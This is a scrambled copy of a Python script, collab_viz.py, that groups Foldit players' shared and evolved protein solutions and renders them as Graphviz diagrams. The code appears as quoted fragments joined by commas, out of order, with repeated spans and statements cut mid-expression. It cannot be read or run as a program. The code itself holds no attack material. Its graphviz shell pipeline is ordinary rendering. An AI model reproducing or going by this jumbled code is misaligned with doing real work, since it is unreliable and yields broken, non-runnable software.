Collaborator(NamedTuple): uid: str", "new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert len(colors) >= len(new_uids) for uid, c in zip(new_uids,", "graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true', # 'style': 'filled', 'fillcolor': cdict[pdbs[0].gid]}, #", "for pdbs in shared.values()), []) evolves_by_source = {tag: list(pdbs) for tag, pdbs in", "cands = e.pdl[-2::-1] i = 0 while cands[i]['header']['score'] == 9999.99 or cands[i]['actions'] ==", "0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True", "uid, c in zip(new_uids, colors): cdict[gid][uid] = c group_colors[uid] = c dot =", "(end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3') evolved.setdefault(\"{}@{:.2f}\".format(uid, p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'],", "x.scoretype == '2' and x.pdl[-1][ 'actions'])]), []))), lambda p: p[0])} for gid, uids", "p in pdbs if p.scoretype == '1' and get_tag(p) in evolved_targets] for pdbs", "cur.children]) if __name__ == '__main__': parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args", "c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else", "+ 1, c) for c in cur.children]) if __name__ == '__main__': parser =", "pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid) >", "target in targets} roots = sum(([p for p in pdbs if p.scoretype ==", "edges uid_grouped = groupby(sorted(active_evolves, key=lambda e: e.uid), lambda e: e.uid) # group by", "np.log10(len(evolves))), style=\"dashed\" if min(e.energy for e in evolves) >= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)]", "groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source = {tag: {uid: list(pdbs) for", "get_source(e)['header']['score']))} for uid, g in uid_grouped} # further group by source active_uids =", "shared = {uid: list(pdbs) for uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x for", "gid = pdbs[0].gid num_ignored = len([p for p in pdbs if \"{}@{:.2f}\".format(uid, p.energy)", "min(e.energy for e in evolves) >= target[1] else \"solid\") evolved[\"{}@{:.2f}\".format(*target)] = True #", "front.pop() # print(\" \"*ntab, cur.tag) # front.extend([(ntab + 1, c) for c in", "for _, uid in g] for gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid,", "d if x.scoretype == '2' and x.pdl[-1]['actions']]), [])) uid_grouped = groupby(sorted(active_evolves, key=lambda e:", "1 return cands[i] def col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff),", "p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid]) # color=\"#ffffff\") for", "ShareTag(NamedTuple): uid: str energy: float class Collaborator(NamedTuple): uid: str gid: str pdbs: List[PDB_Info]", "= colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (p.timestamp - start) / (end - start),", "c in list(plt.get_cmap('tab20').colors) + list(plt.get_cmap('tab20b').colors)] new_uids = uids[:] for prev_uid, color in group_colors.items():", "== 9999.99 for p in pdl) def remove_corrupted(pdb_infos): return [x for x in", "evol_lines_lookup = {uid: get_data_value(uid, pid, \"evol_target_lines\", df) for uid in df.uid} euid_lookup =", "raw source, then use command line graphviz tools to fix cluster layout outname", "uid_source_grouped.values() for target in targets} roots = sum(([p for p in pdbs if", "is_corrupted(p.pdl, p.uid): source = get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 *", "again, this time for people who just loaded in a shared solution but", "euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in", "create evolver nodes & edges uid_grouped = groupby(sorted(active_evolves, key=lambda e: e.uid), lambda e:", "# for target, evolve in evolved_targets.items(): # dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)]", "# map gids to colors cdict = {} # gids = set([xs[0].gid for", "cands[i]['actions'] == {} or cands[i]['header']['uid'] == e.uid: i += 1 return cands[i] def", "d if int(x.sharing_gid) > 1 or (int(x.sharing_gid) == 0 and x.scoretype == '2'", "e in evolves))) # evoling_start = min(e.timestamp for e in evolves) # edge_color", "by evolver uid_source_grouped = { uid: {k: list(g) for k, g in groupby(sorted(g,", "r: sorted(([p for l in r.lines for p in l.pdb_infos] if r.lines else", "in g] for gid, g in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for x", "ShareTag: return ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s: PDB_Info) -> ShareTag: source = get_source(s)", "for uid, c in zip(new_uids, colors): cdict[gid][uid] = c group_colors[uid] = c dot", "{} not found in any evolver lines for {}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag:", "foldit.foldit_data import get_relevant_sids from util import PDB_Info, get_data_value from typing import NamedTuple, Tuple,", "i, line in enumerate(lines): sids = [p.sid for p in line.pdb_infos] if s.sid", "in shared.values()] + [get_source(e)['header']['gid'] for e in active_evolves + passive_evolves]) # cm =", "(p.timestamp - start) / (end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'], source['header']['score']), penwidth='3')", "later actively evolved # # evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), # node_attr={'shape': 'oval'},", "lambda x: euid_lookup[x.sid])} for tag, xs in evolves_by_source.items()} collabs[pid] = [] for root", "evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for gid", "lambda s: get_source_tag(s))} evolves_by_source = {tag: {uid: list(pdbs) for uid, pdbs in groupby(sorted(xs,", "'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid in gids} # for uid, evolved_targets", "in evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\", label=\"{:.2f}\".format(min(e.energy for e in evolves)))", "c in root.energy_components}, tag, None, None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return collabs", "p.uid) else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid'", "evolved_targets in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for target, evolves", "import csv import json import logging from itertools import groupby import pandas as", "new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert len(colors) >= len(new_uids) for uid, c in", "0.9 * (p.timestamp - start) / (end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy), \"{}@{:.2f}\".format(source['header']['uid'],", "else [], {c.name: c.energy * c.weight for c in root.energy_components}, tag, None, None,", "sids: return s.uid + \"evol\" + str(i) raise ValueError(\"evolver pdb {} not found", "pdbs in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source = {tag: {uid:", "== '1' or is_corrupted(p.pdl, p.uid) else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid,", "ValueError(\"evolver pdb {} not found in any evolver lines for {}\".format(s.sid, (s.uid, s.pid)))", "cands[i]['header']['score'] == 9999.99 or cands[i]['actions'] == {} or cands[i]['header']['uid'] == e.uid: i +=", "== '__main__': parser = argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args = parser.parse_args() if", "{} # gids = set([xs[0].gid for xs in shared.values()] + [get_source(e)['header']['gid'] for e", "for people who just loaded in a shared solution but didn't do anything", "== '2' and x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x", "evolves_by_source = {tag: {uid: list(pdbs) for uid, pdbs in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]),", "colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (p.timestamp - start) / (end - start), 0.7)", "pdb in pdbs: if get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child,", "= e.pdl[-2::-1] i = 0 while cands[i]['header']['score'] == 9999.99 or cands[i]['actions'] == {}", "Collaborator(uid, collab.gid, pdbs, {c.name: c.energy * c.weight for c in best.energy_components}, ShareTag(uid, round(best.energy,", "p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x", "[]), key=lambda p: p.timestamp), axis=1) shared = {uid: list(pdbs) for uid, pdbs in", "as plt from graphviz import Digraph from concurrent.futures import ProcessPoolExecutor from foldit.foldit_data import", "PDB_Info, lines: list) -> str: if s.scoretype == \"1\": return s.uid for i,", "== pid] pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines for p", "0 and x.scoretype == '2' and x.pdl[-1][ 'actions'])]), []))), lambda p: p[0])} for", "'{}_passive_evolvers'.format(gid)}) # for gid in gids} # for uid, evolved_targets in uid_source_grouped.items(): #", "# evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): # dot.subgraph(sg) # nodes", "parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args = parser.parse_args() if args.debug: for pid in args.pids:", "in pdbs if \"{}@{:.2f}\".format(uid, p.energy) not in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label':", "in pdbs: if get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source))", "'w') as out: out.write(dot.source) subprocess.run( \"ccomps -xC {} | dot | gvpack -array_c{}", "label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, style='filled,solid' if evolved[\"{}@{:.2f}\".format(uid, p.energy)] else 'filled,dashed', fillcolor=cdict[gid][uid])", "e: e.uid) # uid_source_grouped = { # uid: {k: min(g, key=lambda p: p.energy)", "+ \"evol\" + str(i) raise ValueError(\"evolver pdb {} not found in any evolver", "argparse.ArgumentParser(prog='collab_viz.py') parser.add_argument(\"--debug\", action='store_true') parser.add_argument('pids', nargs='+') args = parser.parse_args() if args.debug: for pid in", "tools to fix cluster layout outname = \"collab_viz/collab_{}\".format(pid) with open(outname, 'w') as out:", "typing import NamedTuple, Tuple, List, Dict import matplotlib matplotlib.use(\"Agg\") def get_source(e): cands =", "for xs in shared.values()] + [get_source(e)['header']['gid'] for e in active_evolves + passive_evolves]) #", "== pid] start = df.timestamps.apply(min).min() end = df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r: sorted(([p", "{c.name: c.energy * c.weight for c in root.energy_components}, tag, None, None, []) collab.children.extend(get_collab_children(tag,", "\"collab_viz/collab_{}\".format(pid) with open(outname, 'w') as out: out.write(dot.source) subprocess.run( \"ccomps -xC {} | dot", "x.scoretype == '2' and x.pdl[-1]['actions']]), [])) passive_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for", "1]), []), key=lambda p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d:", "if \"{}@{:.2f}\".format(uid, p.energy) not in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({}", "d: [x for x in d if int(x.sharing_gid) > 1]), []), key=lambda p:", "any evolver lines for {}\".format(s.sid, (s.uid, s.pid))) def get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source:", "= len([p for p in pdbs if \"{}@{:.2f}\".format(uid, p.energy) not in evolved]) #", "groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])), lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score']))} for uid, g in", "# with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({} ignored)\".format(uid, num_ignored), 'forcelabels': 'true', # 'style':", "10 else 'tab20') # for gid, c in zip(gids, cm.colors): # cdict[gid] =", "uid, pdbs in groupby(sorted(sum(pdb_infos.map( lambda d: [x for x in d if int(x.sharing_gid)", "# color=\"#ffffff\") for cluster in group_clusters.values(): dot.subgraph(cluster) # output raw source, then use", "for p in pdbs if p.scoretype == '1' and get_tag(p) in evolved_targets] for", "int(x.sharing_gid) > 1 or (int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1][", "xs in shared.values()] + [get_source(e)['header']['gid'] for e in active_evolves + passive_evolves]) # cm", "- start) / (end - start), 0.7) # evolving_time = sum(get_sessions([e.timestamp for e", "front = [(1, c) for c in collab.children] # while len(front) > 0:", "in best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab, root_tag, []) children.append(child) for pdb in pdbs:", "in evolved: shape = \"box\" if p.scoretype == '1' or is_corrupted(p.pdl, p.uid) else", "node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid in gids} # for uid,", "str energy: float class Collaborator(NamedTuple): uid: str gid: str pdbs: List[PDB_Info] energy_comps: Dict[str,", "collab in sorted(collabs['2003642'], key=lambda c: c.pdbs[0].gid): # print(collab.pdbs[0].gid) # print(collab.tag) # front =", "*target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if min(e.energy for e in evolves) >=", "plt from graphviz import Digraph from concurrent.futures import ProcessPoolExecutor from foldit.foldit_data import get_relevant_sids", "= get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info, lines: list) -> str:", "len(colors) >= len(new_uids) for uid, c in zip(new_uids, colors): cdict[gid][uid] = c group_colors[uid]", "def col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff), int(col[1] * 0xff),", "for uid, pdbs in shared.items(): gid = pdbs[0].gid for p in pdbs: if", "if int(x.sharing_gid) > 1]), []), key=lambda p: euid_lookup[p.sid]), lambda p: euid_lookup[p.sid])} active_evolves =", "out: out.write(dot.source) subprocess.run( \"ccomps -xC {} | dot | gvpack -array_c{} | neato", "edges for shared solutions for uid, pdbs in shared.items(): gid = pdbs[0].gid for", "{gid: Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid in groups_uids} evolved = {} # create", "p.energy), False) evolved[\"{}@{:.2f}\".format(source['header']['uid'], source['header']['score'])] = True for uid, pdbs in shared.items(): gid =", "p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if", "'2' and x.pdl[-1]['actions'] == {}]), [])) # map gids to colors cdict =", "pid] start = df.timestamps.apply(min).min() end = df.timestamps.apply(max).max() pdb_infos = df.apply(lambda r: sorted(([p for", "= sum(([p for p in pdbs if p.scoretype == '1' and get_tag(p) in", "if get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid) > 1: child.children.extend(get_collab_children(get_tag(pdb), child, evolves_by_source)) return children", "cluster layout outname = \"collab_viz/collab_{}\".format(pid) with open(outname, 'w') as out: out.write(dot.source) subprocess.run( \"ccomps", "[(x.gid, x.uid) for x in d if int(x.sharing_gid) > 1 or (int(x.sharing_gid) ==", "sids] if sids else [], {c.name: c.energy * c.weight for c in root.energy_components},", "node_attr={'style': 'filled'}) as c: for p in pdbs: if \"{}@{:.2f}\".format(uid, p.energy) in evolved:", "for gid in gids} for uid, evolved_targets in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid #", "\"1\": return s.uid for i, line in enumerate(lines): sids = [p.sid for p", "tag, pdbs in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source = {tag:", "= color assert len(colors) >= len(new_uids) for uid, c in zip(new_uids, colors): cdict[gid][uid]", "groups_uids.items(): cdict[gid] = {} group_colors = user_colors.setdefault(gid, {}) colors = [col_to_str(c) for c", "layout outname = \"collab_viz/collab_{}\".format(pid) with open(outname, 'w') as out: out.write(dot.source) subprocess.run( \"ccomps -xC", "= front.pop() # print(\" \"*ntab, cur.tag) # front.extend([(ntab + 1, c) for c", "= groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda e: euid_lookup[e.sid]) # group by evolver uid_source_grouped", "min(g, key=lambda p: p.energy) for k, g in # groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'],", "in new_uids: new_uids.remove(prev_uid) cdict[gid][prev_uid] = color assert len(colors) >= len(new_uids) for uid, c", "= { # uid: {k: min(g, key=lambda p: p.energy) for k, g in", "args.debug: for pid in args.pids: render_collab(pid) else: with ProcessPoolExecutor(30) as pool: pool.map(render_collab, args.pids,", "4)) def get_source_tag(s: PDB_Info) -> ShareTag: source = get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4))", "and get_tag(p) in evolved_targets] for pdbs in shared.values()), []) evolves_by_source = {tag: list(pdbs)", "gids} for uid, evolved_targets in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid)", "(\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff), int(col[1] * 0xff), int(col[2] * 0xff))) def is_corrupted(pdl,", "int(x.sharing_gid) > 1]), []), key=lambda p: p.uid), lambda p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map(", "uid, pdbs in shared.items(): gid = pdbs[0].gid num_ignored = len([p for p in", "[]) children.append(child) for pdb in pdbs: if get_tag(pdb) in evolves_by_source and int(pdb.sharing_gid) >", "source = get_source(p) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (p.timestamp -", "in groups_uids} evolved = {} # create evolver nodes & edges uid_grouped =", "# dot.edge(uid, \"{}@{:.2f}\".format(*target), penwidth='3', style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in", "start), 0.7) # evolving_time = sum(get_sessions([e.timestamp for e in evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid,", "g in groupby( sorted(set(sum(pdb_infos.map(lambda d: [(x.gid, x.uid) for x in d if int(x.sharing_gid)", "d if int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions'] == {}]),", "uid not in active_uids} # screen out anyone who later actively evolved #", "x in d if int(x.sharing_gid) > 1]), []), key=lambda p: euid_lookup[p.sid]), lambda p:", "uid, pdbs in shared.items(): gid = pdbs[0].gid for p in pdbs: if p.scoretype", "x.scoretype == '2' and x.pdl[-1]['actions']]), [])) uid_grouped = groupby(sorted(active_evolves, key=lambda e: euid_lookup[e.sid]), lambda", "or is_corrupted(p.pdl, p.uid) else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy),", "collabs = {} for pid in data.pid.unique(): logging.debug(\"getting team structures for {}\".format(pid)) df", "anyone who later actively evolved # # evolver_clusters = {gid: Digraph(name=\"cluster_passive_ evolve_{}\".format(gid), #", "for {}\".format(pid)) df = data[data.pid == pid] pdb_infos = df.apply(lambda r: sorted(([p for", "# gids = set([xs[0].gid for xs in shared.values()] + [get_source(e)['header']['gid'] for e in", "df = data[data.pid == pid] start = df.timestamps.apply(min).min() end = df.timestamps.apply(max).max() pdb_infos =", "lines: list) -> str: if s.scoretype == \"1\": return s.uid for i, line", "x.pdl[-1][ 'actions'])]), []))), lambda p: p[0])} for gid, uids in groups_uids.items(): cdict[gid] =", "euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for tag, xs in evolves_by_source.items()} collabs[pid] = [] for", "pdbs in groupby(sorted(xs, key=lambda x: euid_lookup[x.sid]), lambda x: euid_lookup[x.sid])} for tag, xs in", "# further group by source evolved_targets = {target for targets in uid_source_grouped.values() for", "if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) evol_lines_lookup = {uid: get_data_value(uid, pid,", "# for gid in gids} # for uid, evolved_targets in uid_source_grouped.items(): # gid", "pdbs[0].gid for p in pdbs: if p.scoretype == '2' and not is_corrupted(p.pdl, p.uid):", "for i, line in enumerate(lines): sids = [p.sid for p in line.pdb_infos] if", "list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for target, evolves in evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid,", "e in evolves]) group_clusters[gid].edge(\"{} on {}@{:.2f}\".format(uid, *target), \"{}@{:.2f}\".format(*target), penwidth=str(0.2 + np.log10(len(evolves))), style=\"dashed\" if", "= True # for sg in evolver_clusters.values(): # dot.subgraph(sg) # do it again,", "evolver_clusters[gid].node(uid, fillcolor=cdict[gid], label=uid) for target, evolves in evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid],", "Digraph(name=\"cluster_{}\".format(gid), graph_attr={'label': \"group_{}\".format(gid)}) for gid in groups_uids} evolved = {} # create evolver", "euid_lookup[p.sid])} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if x.scoretype", "+ 0.9 * (p.timestamp - start) / (end - start), 0.7) group_clusters[gid].edge(\"{}@{:.2f}\".format(uid, p.energy),", "node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for gid in gids} for uid, evolved_targets", "[x for x in d if int(x.sharing_gid) > 1]), []), key=lambda p: p.uid),", "in d if int(x.sharing_gid) == 0 and x.scoretype == '2' and x.pdl[-1]['actions']]), []))", "in d if x.scoretype == '2' and x.pdl[-1]['actions']]), [])) uid_grouped = groupby(sorted(active_evolves, key=lambda", "s: get_source_tag(s))} evolves_by_source = {tag: {uid: list(pdbs) for uid, pdbs in groupby(sorted(xs, key=lambda", "is_corrupted(p.pdl, p.uid) else \"diamond\" # c.node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape, group_clusters[gid].node(\"{}@{:.2f}\".format(uid, p.energy), label=\"{:.2f}\".format(p.energy), shape=shape,", "get_tag(root) sids = get_relevant_sids(root, soln_lookup, child_lookup) collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid", "uid, g in uid_grouped} # further group by source active_uids = list(uid_source_grouped.keys()) #", "c in best.energy_components}, ShareTag(uid, round(best.energy, 4)), collab, root_tag, []) children.append(child) for pdb in", "e: get_source_tag(e))} for uid, g in uid_grouped} # further group by source evolved_targets", "# node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_active_evolvers'.format(gid)}) # for gid in gids} for uid,", "if p.scoretype == '1' and get_tag(p) in evolved_targets] for pdbs in shared.values()), [])", "= remove_corrupted(sum(pdb_infos.map( lambda d: [x for x in d if x.scoretype == '2'", "x in d if int(x.sharing_gid) > 1]), []), key=lambda p: p.uid), lambda p:", "line graphviz tools to fix cluster layout outname = \"collab_viz/collab_{}\".format(pid) with open(outname, 'w')", "fillcolor=cdict[gid], label=uid) for target, evolves in evolved_targets.items(): group_clusters[gid].node(\"{} on {}@{:.2f}\".format(uid, *target), fillcolor=cdict[gid][uid], shape=\"oval\",", "x.scoretype == '2' and x.pdl[-1]['actions'] == {}]), [])) # map gids to colors", "style='dashed') # evolved[\"{}@{:.2f}\".format(*target)] = True # for sg in evolver_clusters.values(): # dot.subgraph(sg) #", "in gids} for uid, evolved_targets in uid_source_grouped.items(): gid = list(evolved_targets.values())[0][0].gid # evolver_clusters[gid].node(uid, fillcolor=cdict[gid],", "for p in pdl) def remove_corrupted(pdb_infos): return [x for x in pdb_infos if", "0xff), int(col[1] * 0xff), int(col[2] * 0xff))) def is_corrupted(pdl, uid): return all(p['actions'] ==", "ShareTag(s.uid, round(s.energy, 4)) def get_source_tag(s: PDB_Info) -> ShareTag: source = get_source(s) return ShareTag(source['header']['uid'],", "in evolves) # edge_color = colorsys.hsv_to_rgb(0.28, 0.1 + 0.9 * (evoling_start - start)", "else []), key=lambda p: p.timestamp), axis=1) evol_lines_lookup = {uid: get_data_value(uid, pid, \"evol_target_lines\", df)", "== \"1\": return s.uid for i, line in enumerate(lines): sids = [p.sid for", "uid: str gid: str pdbs: List[PDB_Info] energy_comps: Dict[str, float] tag: ShareTag parent: \"Collaborator\"", "round(best.energy, 4)), collab, root_tag, []) children.append(child) for pdb in pdbs: if get_tag(pdb) in", "source active_uids = list(uid_source_grouped.keys()) # evolver_clusters = {gid: Digraph(name=\"cluster_active_evolve_{}\".format(gid), # node_attr={'shape': 'oval'}, #", "zip(new_uids, colors): cdict[gid][uid] = c group_colors[uid] = c dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true',", "key=lambda p: p.uid), lambda p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda d: [x for", "# node_attr={'shape': 'oval'}, # graph_attr={'label': '{}_passive_evolvers'.format(gid)}) # for gid in gids} # for", "= Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid in sids] if sids else [], {c.name:", "cands[i] def col_to_str(col): return '#' + (\"%0.2X%0.2X%0.2X\" % (int(col[0] * 0xff), int(col[1] *", "{} or p['header']['uid'] == uid or p['header']['uid'] == '0' or p['header']['score'] == 9999.99", "gid in groups_uids} evolved = {} # create evolver nodes & edges uid_grouped", "key=lambda p: p.energy) for k, g in # groupby(sorted(g, key=lambda e: (get_source(e)['header']['uid'], get_source(e)['header']['score'])),", "group_colors[uid] = c dot = Digraph(name=\"parent\", graph_attr={'forecelabels': 'true', 'K': '0.6', 'repulsiveforce': '2'}, node_attr={'style':", "p.scoretype == '1' and get_tag(p) in evolved_targets] for pdbs in shared.values()), []) evolves_by_source", "k, g in groupby(sorted(g, key=lambda e: get_source_tag(e)), lambda e: get_source_tag(e))} for uid, g", "p in pdbs if \"{}@{:.2f}\".format(uid, p.energy) not in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), #", "= data[data.pid == pid] pdb_infos = df.apply(lambda r: sorted(([p for l in r.lines", "= \"collab_viz/collab_{}\".format(pid) with open(outname, 'w') as out: out.write(dot.source) subprocess.run( \"ccomps -xC {} |", "ShareTag: source = get_source(s) return ShareTag(source['header']['uid'], round(source['header']['score'], 4)) def get_evolver_uid(s: PDB_Info, lines: list)", "collab: Collaborator, evolves_by_source: dict) -> List[Collaborator]: children = [] for uid, pdbs in", "= {} for pid in data.pid.unique(): print(pid) df = data[data.pid == pid] start", "targets in uid_source_grouped.values() for target in targets} roots = sum(([p for p in", "in uid_grouped} # further group by source evolved_targets = {target for targets in", "collab, root_tag, []) children.append(child) for pdb in pdbs: if get_tag(pdb) in evolves_by_source and", "sids else [], {c.name: c.energy * c.weight for c in root.energy_components}, tag, None,", "list(pdbs) for tag, pdbs in groupby(sorted(active_evolves, key=lambda s: get_source_tag(s)), lambda s: get_source_tag(s))} evolves_by_source", "for p in l.pdb_infos] if r.evol_lines else []), key=lambda p: p.timestamp), axis=1) shared", "\"{}@{:.2f}\".format(uid, p.energy) not in evolved]) # with dot.subgraph(name=\"cluster_{}\".format(uid), # graph_attr={'label': \"{}_shared ({} ignored)\".format(uid,", "get_collab_children(root_tag: ShareTag, collab: Collaborator, evolves_by_source: dict) -> List[Collaborator]: children = [] for uid,", "get_data_value from typing import NamedTuple, Tuple, List, Dict import matplotlib matplotlib.use(\"Agg\") def get_source(e):", "solutions for uid, pdbs in shared.items(): gid = pdbs[0].gid for p in pdbs:", "ShareTag children: List[\"Collaborator\"] def get_tag(s: PDB_Info) -> ShareTag: return ShareTag(s.uid, round(s.energy, 4)) def", "# screen out anyone who later actively evolved # # evolver_clusters = {gid:", "line.pdb_infos] if s.sid in sids: return s.uid + \"evol\" + str(i) raise ValueError(\"evolver", "None, None, []) collab.children.extend(get_collab_children(tag, collab, evolves_by_source)) collabs[pid].append(collab) return collabs # for collab in", "for target in targets} roots = sum(([p for p in pdbs if p.scoretype", "== 0 and x.scoretype == '2' and x.pdl[-1][ 'actions'])]), []))), lambda p: p[0])}", "soln_lookup, child_lookup) collab = Collaborator(tag.uid, root.gid, [soln_lookup[sid] for sid in sids] if sids", "> 1]), []), key=lambda p: p.uid), lambda p: p.uid)} active_evolves = remove_corrupted(sum(pdb_infos.map( lambda", "| gvpack -array_c{} | neato -Tpng -n2 -o {}.png\".format(outname, len(groups_uids)+1, outname), shell=True, check=True)", "== '2' and x.pdl[-1]['actions'] == {}]), [])) # map gids to colors cdict", "+ 